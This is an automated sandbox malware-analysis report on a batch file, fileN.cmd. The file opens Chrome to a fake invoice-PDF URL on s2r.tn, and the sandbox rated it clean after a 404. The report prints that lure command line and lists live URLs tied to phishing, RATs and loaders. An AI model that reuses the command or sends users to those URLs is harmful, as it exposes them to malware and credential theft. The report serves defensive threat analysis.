Edit tour

Windows Analysis Report
fileN.cmd

Overview

General Information

Sample name:	fileN.cmd
Analysis ID:	1446783
MD5:	b0440336a17e2a86c8fdaab419c3a3f7
SHA1:	f831b05ff3fc56c2e023e4121e07b895fe1d9153
SHA256:	7d5848842e934d5a57fb8766962a556e01c3715481d63d2a10dbca4bac897ddf
Tags:	cmd
Infos:

Detection

Score:	2
Range:	0 - 100
Whitelisted:	false
Confidence:	60%

Signatures

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Sample execution stops while process was sleeping (likely an evasion)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 5424 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fileN.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 4136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 4092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,2758172289711227357,3117054335507487613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://s2r.tn/cgi/INVOICERVSHA.pdf

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:49720 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 70.38.21.234 70.38.21.234
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183

Source: global traffic	HTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s2r.tn/cgi/INVOICERVSHA.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xDvV1b4DS8yY7Hh&MD=9xpw3R+4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xDvV1b4DS8yY7Hh&MD=9xpw3R+4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: s2r.tn
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:06:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:06:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:06:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: fileN.cmd

String found in binary or memory: https://s2r.tn/cgi/INVOICERVSHA.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:49720 version: TLS 1.2

Source: classification engine

Classification label: clean2.winCMD@18/4@4/4

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fileN.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,2758172289711227357,3117054335507487613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,2758172289711227357,3117054335507487613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\cmd.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	11 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 DLL Side-Loading	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fileN.cmd	0%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://s2r.tn/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s2r.tn	70.38.21.234	true	false		unknown
www.google.com	216.58.212.132	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://s2r.tn/cgi/INVOICERVSHA.pdf	false		unknown
https://s2r.tn/favicon.ico	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
70.38.21.234	s2r.tn	Canada	32613	IWEB-ASCA	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
216.58.212.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446783
Start date and time:	2024-05-23 21:05:58 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fileN.cmd
Detection:	CLEAN
Classification:	clean2.winCMD@18/4@4/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.186.46, 74.125.133.84, 34.104.35.123, 199.232.214.172, 192.229.221.95, 142.250.181.227, 172.217.18.14
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: fileN.cmd

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct	{ "loginform": false, "reasons": [ "The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.", "It is a 404 error message, which means the page was not found and there is no login form on this page." ] }
Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDument to handle the request.

Input

Output

URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct

{
"loginform": false,
"reasons": [
"The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.",
"It is a 404 error message, which means the page was not found and there is no login form on this page."
]
}

Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDument to handle the request.

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
70.38.21.234	filePY.cmd	Get hash	malicious	Unknown	Browse
	file py p.bat	Get hash	malicious	Unknown	Browse
	file py portable.bat	Get hash	malicious	Unknown	Browse
	fileEEE.bat	Get hash	malicious	Unknown	Browse
	https://greenwoodpark.com.au/hvilkes-receipt.zip	Get hash	malicious	Unknown	Browse
	https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##	Get hash	malicious	Unknown	Browse
	upload.vbs	Get hash	malicious	VenomRAT	Browse
	update.vbs	Get hash	malicious	XWorm	Browse
	windows.vbs	Get hash	malicious	XWorm	Browse
	file.bat	Get hash	malicious	Unknown	Browse
239.255.255.250	new.cmd	Get hash	malicious	GuLoader	Browse
	filePY.cmd	Get hash	malicious	Unknown	Browse
	http://hxjmm.check-tl-ver-154-2.com	Get hash	malicious	Unknown	Browse
	https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recording	Get hash	malicious	Unknown	Browse
	https://t.co/PmbTTSQ6z4	Get hash	malicious	Unknown	Browse
	b23c466-Payment Reciept May 22 2024.html	Get hash	malicious	Unknown	Browse
	https://freexxxth.link	Get hash	malicious	Unknown	Browse
	https://freexxxth.link	Get hash	malicious	Unknown	Browse
	https://www.flipsnack.com/C65D7DCC5A8/sw-bruce-limited/full-view.html	Get hash	malicious	Unknown	Browse
	https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s2r.tn	filePY.cmd	Get hash	malicious	Unknown	Browse	70.38.21.234
	file py p.bat	Get hash	malicious	Unknown	Browse	70.38.21.234
	file py portable.bat	Get hash	malicious	Unknown	Browse	70.38.21.234
	fileEEE.bat	Get hash	malicious	Unknown	Browse	70.38.21.234
	https://greenwoodpark.com.au/hvilkes-receipt.zip	Get hash	malicious	Unknown	Browse	70.38.21.234
	upload.vbs	Get hash	malicious	VenomRAT	Browse	70.38.21.234
	update.vbs	Get hash	malicious	XWorm	Browse	70.38.21.234
	windows.vbs	Get hash	malicious	XWorm	Browse	70.38.21.234
	file.bat	Get hash	malicious	Unknown	Browse	70.38.21.234
	file.vbs	Get hash	malicious	Unknown	Browse	70.38.21.234

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
IWEB-ASCA	filePY.cmd	Get hash	malicious	Unknown	Browse	70.38.21.234
	file py p.bat	Get hash	malicious	Unknown	Browse	70.38.21.234
	file py portable.bat	Get hash	malicious	Unknown	Browse	70.38.21.234
	fileEEE.bat	Get hash	malicious	Unknown	Browse	70.38.21.234
	IUzBqUNYMK.elf	Get hash	malicious	Unknown	Browse	174.142.183.68
	https://greenwoodpark.com.au/hvilkes-receipt.zip	Get hash	malicious	Unknown	Browse	70.38.21.234
	https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##	Get hash	malicious	Unknown	Browse	70.38.21.234
	WDzkAh06Pf.elf	Get hash	malicious	Mirai	Browse	70.38.94.230
	DHL-2854-56463.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	107.161.75.133
	Statement of account.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	174.142.95.75

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	new.cmd	Get hash	malicious	GuLoader	Browse	184.28.90.27 20.114.59.183
	filePY.cmd	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://t.co/PmbTTSQ6z4	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	b23c466-Payment Reciept May 22 2024.html	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://www.flipsnack.com/C65D7DCC5A8/sw-bruce-limited/full-view.html	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 20.114.59.183
	http://all4promos.com	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	http://qcqsn.drivers-hp-dell-asus.ru/4Clxwy9769ZIGi545pwqtzclyna14499EAEPPODKZHNKREZ30JPNY13019f17	Get hash	malicious	Phisher	Browse	184.28.90.27 20.114.59.183
	http://kerapoxy.cc	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 47

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
